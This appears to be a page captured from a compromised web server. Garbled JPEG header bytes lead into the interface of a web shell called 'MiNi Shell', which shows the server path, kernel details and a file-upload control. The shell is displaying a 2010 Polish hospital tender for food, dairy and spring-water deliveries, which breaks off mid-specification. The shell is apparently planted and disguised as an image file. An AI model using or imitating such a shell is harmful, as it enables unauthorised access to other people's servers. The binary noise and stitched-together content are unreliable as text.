JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100810/215001-N-2010.html

<p class="kh_header"><b>Olsztyn: sukcesywne dostawy artykułów spożywczych, nabiału i wody mineralnej</b><br>
<b>Numer ogłoszenia: 215001 - 2010; data zamieszczenia: 10.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Szpital Zespolony , ul. Niepodległości 44, 10-045 Olsztyn, woj. warmińsko-mazurskie, tel. (089) 532 6349, faks (089) 5326349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> sukcesywne dostawy artykułów spożywczych, nabiału i wody mineralnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa naturalnej wody źródlanej do urządzeń dozujących, artykułów ogólnospożywczych, mleka, jego przetworów i tłuszczy roślinnych, zgodnie ze  szczegółowym opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ.

Cz. 1. Woda źródlana do urządzeń dozujących.
Cz. 2. Artykuły ogólnospożywcze.
Cz.3.  Mleko, jego przetwory i tłuszcze roślinne

Zamawiający dopuszcza składanie ofert równoważnych, tj. ofert obejmujących artykuły nie gorsze i odpowiadające parametrami organoleptycznymi oraz jakościowymi artykułom wyszczególnionym w Formularzu asortymentowym, różniącymi się od nich jedynie nazwą. 

Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, zgodnie z art. 30 ust. 2 ustawy, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego w Formularzu asortymentowym. 

Artykuły spożywcze muszą być dostarczane w opakowaniach jednostkowych opisanych w Formularzu asortymentowym lub w opakowaniach o gramaturze bardzo zbliżonej, nie mniejszej niż opisana przez Zamawiającego. Nie dopuszcza się dostaw luzem w opakowaniach np. 20kg, 50kg 

Artykuły muszą być dostarczone w oryginalnych opakowaniach zbiorczych oraz jednostkowych producenta z oryginalnym oznakowaniem w języku polskim.

Artykuły spożywcze muszą być wysokiej jakości, nie niższej niż wynika to z Formularza cenowego.

Zamówienie będzie realizowane na zasadach i warunkach określonych w SIWZ, w tym załącznikach do SIWZ, a w szczególności projekcie umowy, ofercie wybranego Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.98.81.00-8, 15.80.00.00-6, 15.50.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli ze złożonych dokumentów będzie wynikało, że wykonawca może prowadzić działalność w zakresie objętym przedmiotem zamówienia. Natomiast jeżeli nie będzie posiadał takiego uprawnienia - nie spełni warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest złożenie oświadczenia, w trybie art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest złożenie oświadczenia, w trybie art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest złożenie oświadczenia, w trybie art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest złożenie oświadczenia, w trybie art. 22 ust. 1 Ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>(a)dla części I. Woda źródlana do urządzeń dozujących.
1)  oświadczenie o stopniu wdrożenia zasad GMP/GHP oraz systemu HACCP lub Systemu Zarządzania Bezpieczeństwem Żywności; jeżeli zakład posiada certyfikowany system  - kopię certyfikatu;
2)dokument dopuszczający do transportu żywności samochody transportowe wykonawcy, które wykonawca przeznacza do realizacji zamówienia.
3)Próbek - w przypadku składania ofert równoważnych artykułom opisanym przez Zamawiającego w Formularzu asortymentowym.

(b)dla części II: Artykuły ogólnospożywcze.
1) oświadczenie o stopniu wdrożenia zasad GMP/GHP oraz systemu HACCP lub Systemu Zarządzania Bezpieczeństwem Żywności; jeżeli zakład posiada certyfikowany system  - kopię certyfikatu.
2) dokument dopuszczający do transportu żywności samochody transportowe wykonawcy, które wykonawca przeznacza do realizacji zamówienia.
3) Próbek - w przypadku składania ofert równoważnych artykułom opisanym przez Zamawiającego w Formularzu asortymentowym.

(c)dla części III: Mleko, jego przetwory i tłuszcze roślinne.
1) w przypadku producenta świadectwo nadzoru weterynaryjnego zakładu, z którego pochodzą produkty lub w przypadku hurtowni - świadectwo nadzoru Państwowego Inspektoratu Sanitarnego;
2) oświadczenie o stopniu wdrożenia zasad GMP/GHP oraz systemu HACCP lub Systemu Zarządzania Bezpieczeństwem Żywności; jeżeli zakład posiada certyfikowany system  - kopię certyfikatu.
3) dokument dopuszczający do transportu żywności samochody transportowe wykonawcy, które wykonawca przeznacza do realizacji zamówienia.
4) Próbek - w przypadku składania ofert równoważnych artykułom opisanym przez Zamawiającego w Formularzu asortymentowym.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> adres e-mail: zamowienia@szpital.olsztyn.pl; Miejski Szpital Zespolony w Olsztynie, ul. Niepodległości 44, bud. Administracji, pok. 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2010 godzina 10:00, miejsce: Miejski Szpital Zespolony w Olsztynie, ul. Niepodległości 44, bud. Administracji, pok. 27.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> (woda źródlana do urządzeń dozujących.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> NATURALNA WODA ŻRÓDLANA DO URZĄDZEŃ DOZUJĄCYCH
Naturalna woda źródlana w butlach o pojemności 18,9 - 19,00 l              1500 szt

I.Wymagania ogólne 
1. Jakość przyjmowanego surowca musi odpowiadać normom handlowym oraz wymaganiom specyfikacji wewnętrznej zamawiającego, czyli właściwości środków spożywczych określonych jako pożądane - stan idealny do małych odchyleń.
2. Jakość organoleptyczną żywności, której nie można ocenić przy przyjęciu towaru, sprawdzana jest przy produkcji. W przypadku nie spełnienia wymagań surowiec zostaje zwrócony do dostawcy a fakt odnotowany w formularzu reklamacyjnym.
3. Znakowanie artykułów spożywczych musi zapewnić ich pełną identyfikowalność.
W przypadku nieodpowiedniego oznakowania oraz środków spożywczych po dacie minimalnej trwałości lub przekroczonym terminie przydatności do spożycia nastąpi odmowa przyjęcia, odnotowana w formularzu reklamacyjnym.
4. Materiał opakowaniowy i transportowy  dopuszczony do kontaktu z żywnością
5. Dostawca musi funkcjonować zgodnie z aktualnymi wymaganiami prawa żywnościowego, sposób dostawy oraz dostarczana żywność musi być zgodna z wszystkimi wymaganiami prawa żywnościowego.
6.Bezpłatna dzierżawa urządzeń dozujących grzewczo - chłodzących w ilości    33 szt, obejmująca bezpłatne: 
- serwis i obsługę, 
- naprawy (czas reakcji na zgłoszenie awarii do 24 h) i konsewację, 
- sanityzację wszystkich urządzeń co 6 miesięcy z wymianą wszystkich elementów urządzenia mających bezpośredni kontakt z wodą m.in: kołnierz dozujący wraz z filtrem, zbiornik wody zimnej, kranik do zimnej i gorącej wody (sanityzacja potwierdzona dokumentem wykonania).
7. Bezpłatne i punktualne dostawy wody.
8. Bezpłatna dzierżawa stojaków na butle w zależności od potrzeb.

II. Wymagania szczegółowe - wymagane właściwości żywności (specyfikacja wewnętrzna)

Woda źródlana
Opakowanie
Butle PET, czyste, nieuszkodzone, szczelnie zamknięte, dokładne zabezpieczenie, zamknięcie butli wraz z plombą, bez oznak otwarcia, prawidłowo oznakowane
Właściwości fizykochemiczne i biologiczne
Zgodnie z prawem żywnościowym, Bez zanieczyszczeń obcych, brak zanieczyszczeń chemicznych, brak oznak i obecności pleśni, brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych, brak szkodników magazynowych i ich śladów
Wygląd, barwa
Bezbarwna, klarowna bez zanieczyszczeń fizycznych
Smak i zapach
bez obcych posmaków, i zapachów, niedopuszczalny zapach stęchły, pleśniowy
klarowność
Woda klarowna, czysta bez zanieczyszczeń fizycznych i osadów, 

III. Wymagania przy każdej dostawie:
1.do każdej dostawy odpowiednią dokumentację: badanie wody
2.warunki transportowe muszą być zgodne z zasadami GMP/GHP, do wglądu książka mycia i dezynfekcji pojazdu oraz książeczka zdrowia kierowcy, powinien posiadać na sobie czysty fartuch,
3.realizacja zamówienia do godz. 7.00 - 11.00 w dniu następującym po dniu złożenia, bezpośrednio do magazynu żywnościowego do osoby upoważnionej do odbioru- magazyniera 
4.woda musi posiadać maksymalny okres przydatności do spożycia przewidziany dla danego artykułu
5.w przypadku reklamacji woda, musi być ona zabrana lub wymieniona przez dostawcę w tym samym dniu roboczym do godz. 14.00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.98.81.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ARTYKUŁY OGÓLNOSPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. WYMAGANIA OGÓLNE
1. Jakość przyjmowanego surowca musi odpowiadać normom handlowym oraz wymaganiom specyfikacji wewnętrznej zamawiającego, czyli właściwości środków spożywczych określonych jako pożądane - stan idealny do małych odchyleń.
2. Jakość organoleptyczną żywności, której nie można ocenić przy przyjęciu towaru, sprawdzana jest przy produkcji. W przypadku nie spełnienia wymagań surowiec zostaje zwrócony do dostawcy a fakt odnotowany w formularzu reklamacyjnym
3. Znakowanie artykułów spożywczych musi zapewnić ich pełną identyfikowalność. W przypadku nieodpowiedniego oznakowania oraz środków spożywczych po dacie minimalnej trwałości lub przekroczonym terminie przydatności do spożycia nastąpi odmowa przyjęcia, odnotowana w formularzu reklamacyjnym.
4. Materiał opakowaniowy i transportowy  dopuszczony do kontaktu z żywnością
5. Dostawca musi funkcjonować zgodnie z aktualnymi wymaganiami prawa żywnościowego, sposób dostawy oraz dostarczana żywność musi być zgodna z wszystkimi wymaganiami prawa żywnościowego.

II. Wymagania szczegółowe poszczególnych grup asortymentowych - wymagane właściwości środków spożywczych ( specyfikacja wewnętrzna). 

Grupa asortymentowa: tłuszcze jadalne: oleje 

opakowanie
Olej rzepakowy: butelki PE, 
Czyste, nie uszkodzone, szczelnie zamknięte, prawidłowo oznakowane

Cechy sensoryczne
Wygląd
Olej: barwa jasnosłomkowa, ,
, 


tekstura i konsystencja  
dopuszczalne zgęstnienie w przypadku przechowywania poniżej 4 oC


Smak
Oleje, obojętny lub delikatnie swoisty dla surowca, zapach typowy dla surowca, 


zapach
Obojętny lub delikatny typowy dla surowca, 

Właściwości fizykochemiczne i biologiczne
Brak zanieczyszczeń chemicznych lub biologicznych, brak obecności pleśni, brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych

Marynaty warzywne: ogórki konserwowe, papryka, chrzan , 

opakowanie
Szklane, bez wyszczerbień, nie uszkodzone, szczelne, właściwie oznakowane, czyste

Cechy sensoryczne
Wygląd
 zalewa klarowna lub opalizująca, z dopuszczalnym osadem pochodzącym z przypraw i nasion


tekstura i konsystencja  
Zachowana wielkość i kształt nadany przez rozdrobnienie, możliwie wyrównany, konsystencja możliwie jednolita, charakterystyczna dla użytego gatunku, zwięzła, 


Smak
Kwaśno - słodki, z wyczuwalnym smakiem i aromatem przypraw, bez zapachów i posmaków obcych


zapach
Kwaśno - słodki, z wyczuwalnym smakiem i aromatem przypraw, bez zapachów i posmaków obcych

Właściwości fizykochemiczne i biologiczne
Zawartość zanieczyszczeń organicznych pochodzenia roślinnego nie więcej niż 0,02 - 0,03 %, Brak zanieczyszczeń chemicznych, brak oznak i obecności pleśni, brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych

Warzywa utrwalone termicznie - konserwy warzywne- groszek, kukurydza, pomidory

opakowanie
Puszki z blachy powlekanej, szczelne, bez odkształceń, czyste, odpowiednio oznakowane

Cechy sensoryczne
Wygląd
Zachowany charakterystyczny kształt i forma warzyw, barwa typowa dla danego składnika, zmieniona procesem technologicznym, stosunek masy warzyw po odcieku do masy netto produktu nie mniej niż 45 %

tekstura i konsystencja  
Miękkie ale nierozgotowane, 

Smak
Charakterystyczny, bez obcych  posmaków,

zapach
Charakterystyczny, bez obcych zapachów 
Właściwości fizykochemiczne i biologiczne
Bez zanieczyszczeń  fizycznych, chemicznych oraz biologicznych w tym bakterii chorobotwórczych

Susze owocowe i warzywne, bakalie, strączkowe suche

opakowanie
Torebki foliowe odpowiednio oznakowane, czyste, całe, nie zawilgocone, 

Cechy sensoryczne
Wygląd
Kształt - zachowany nadany przez rozdrobnienie, jednorodny ( z wyjątkiem mieszanek), barwa typowa dla gatunku i odmiany, z dopuszczalnym pociemnieniem 

tekstura i konsystencja  
konsystencja elastyczna, nie zlepiająca się przy ucisku, bez zbryleń, ziarna kształtne

Smak
Charakterystyczny dla owoców i warzyw suszonych danego gatunku, bez posmaków obcych

zapach
Charakterystyczny dla owoców i warzyw suszonych danego gatunku, bez zapachów obcych
Właściwości fizykochemiczne i biologiczne
Zawartość wody nie więcej niż 10 - 35 %, zawartość zanieczyszczeń organicznych pochodzenia roślinnego nie więcej niż 0,3 %, niedopuszczalna  obecność szkodników lub ich śladów, pleśni oraz bakterii chorobotwórczych

Przeciery: ogórkowy, pomidorowy, szczaw, ocet

opakowanie
Szklane, bez wyszczerbień, nie uszkodzone, szczelne, właściwie oznakowane, czyste

Cechy sensoryczne
Wygląd
Barwa właściwa dla danego gatunku, ocet bezbarwny


tekstura i konsystencja  
 Jednorodna,  przetarta masa, bez rozwarstwień, ocet płynna, klarowna


Smak
Charakterystyczny dla surowca, lekko kwaśny,   bez posmaków obcych, ocet kwaśny


zapach
Charakterystyczny dla surowca, bez zapachów obcych, ocet ostry kwaśny

Właściwości fizykochemiczne i biologiczne
Zawartość zanieczyszczeń organicznych pochodzenia roślinnego nie więcej niż 0,05 %, Brak zanieczyszczeń chemicznych, brak oznak gnicia, zapleśnienia, sfermentowania,  brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych, 

Soki, dżemy, miód sztuczny, zaprawy

opakowanie
Szklane, bez wyszczerbień, nie uszkodzone, szczelne, właściwie oznakowane, czyste, soki też kartonowe ( papier i folia wielowarstwowa)

Cechy sensoryczne
Wygląd
Barwa charakterystyczna dla użytych owoców, osłabiona procesem technologicznym, soki naturalnie  mętne, 
Dżemy zżelowane fragmenty owoców w zżelowanej , szlostej masie, zależnie od gatunku owoców,  możliwe większe rozdrobnienie owoców


tekstura i konsystencja  
Soki naturalnie mętne,
Dżemy żżelowana, smarowna, 


Smak
 Soki charakterystyczny dla użytych owoców, bez obcych posmaków,
Dżemy kwaśno - słodki, bez obcych posmaków,



zapach
Charakterystyczny dla użytych owoców, bez obcych zapachów





Właściwości fizykochemiczne i biologiczne
Bez obecności szkodników, roztoczy i ich śladów, brak oznak pleśni lub fermentacji, Brak zanieczyszczeń chemicznych, brak oznak gnicia, zapleśnienia, sfermentowania,  brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych

Mąki

opakowanie
torebki papierowe, odpowiednio oznakowane, czyste, bez oznak zawilgocenia, zapleśnienia, obecności szkodników zbożowo - mącznych, całe

Cechy sensoryczne
Wygląd
Barwa biała z odcieniem żółtawym, mąką żytnia ciemniejsza, 

tekstura i konsystencja  
Gładka, , śliska w dotyku, sypka,  

Smak
Swoisty , lekko słodkawy, 

zapach
Przyjemny, swoisty, charakterystyczny dla danej mąki, bez obcych zapachów, 
Właściwości fizykochemiczne i biologiczne
Wilgotność do 15 %, brak obecności zanieczyszczeń fizycznych ( piasku) i biologicznych, obecności pleśni, szkodników, bakterii chorobotwórczych

Kasze, ryż, otręby, makarony,  koncentraty zbożowe: płatki, kleiki, kaszki, pieczywo chrupkie

opakowanie
Torebki papierowe z folią wielowarstwową lub folia, odpowiednio oznakowane, czyste, bez oznak zawilgocenia, zapleśnienia, obecności szkodników zbożowo - mącznych, całe

Cechy sensoryczne
Wygląd
Charakterystyczny dla danego gatunku, bez oznak zepsucia, uszkodzeń, prawidłowy kształt i barwa ziaren, bez zanieczyszczeń fizycznych

tekstura i konsystencja  
Charakterystyczna dla stopnia rozdrobnienia, sypka, suche, bez oznak lepkości i grudek, pieczywo chrupkie, 1 część wagowa kaszy suchej po ugotowaniu ma dawać 2,5 części wagowych  kaszy gotowanej 

Smak
po ugotowaniu smak i zapach odpowiadający produktowi świeżemu,  wykluczony posmak skwaśniały lub gorzki, 

zapach
 charakterystyczny, bez obcych zapachów, stęchłych
Właściwości fizykochemiczne i biologiczne
Brak zanieczyszczeń fizycznych, oznak i pozostałości szkodników, brak zanieczyszczeń biologicznych, pleśni oraz  bakterii chorobotwórczych

Makarony

opakowanie
Torebki foliowe, odpowiednio oznakowane, czyste, bez oznak zawilgocenia, zapleśnienia, obecności szkodników zbożowo - mącznych, całe

Cechy sensoryczne
Wygląd
Barwa jednolita, kremowa lub jasnożółta bez pęknięć i rys, prawidłowy kształt, całe elementy,  bez zanieczyszczeń fizycznych, błyszcząca powierzchnia


tekstura i konsystencja  
Charakterystyczna dla stopnia rozdrobnienia i formy, suchy, gładka powierzchnia, szklisty po przełamaniu, w czasie gotowania zwiększenie objętości 2-3 razy, bez oznak lepkości i grudek,  po ugotowaniu elastyczny, zachowuje pierwotny kształt, nie skleja się i nie ciemnieje


Smak
po ugotowaniu smak i zapach odpowiadający produktowi świeżemu, przyjemny, wykluczony posmak skwaśniały lub gorzki, 


zapach
 charakterystyczny, przyjemny,  bez obcych zapachów, stęchłych

Właściwości fizykochemiczne i biologiczne
Brak zanieczyszczeń fizycznych, oznak i pozostałości szkodników, brak zanieczyszczeń biologicznych, pleśni oraz  bakterii chorobotwórczych

Koncentraty spożywcze: koncentraty deserów ( budynie, kisiele galaretki), kwasek cytrynowy, buliony oraz mleko w proszku, żelatyna, kawa zbożowa

opakowanie
Torebki papierowe z folią wielowarstwową, odpowiednio oznakowane, czyste, bez oznak zawilgocenia, zapleśnienia, obecności szkodników, całe, szczelne

Cechy sensoryczne
Wygląd
Charakterystyczny dla rodzaju, barwa charakterystyczna dla rodzaju, mleko barwa biała do lekko kremowej, 


tekstura i konsystencja  
Sypka, bez grudek, nie zlepiająca się przy ucisku, bez zbryleń, łatwo rozpuszczalne, 


Smak
Charakterystyczny dla rodzaju i określonego smaku przez producenta, bez obcych posmaków


zapach
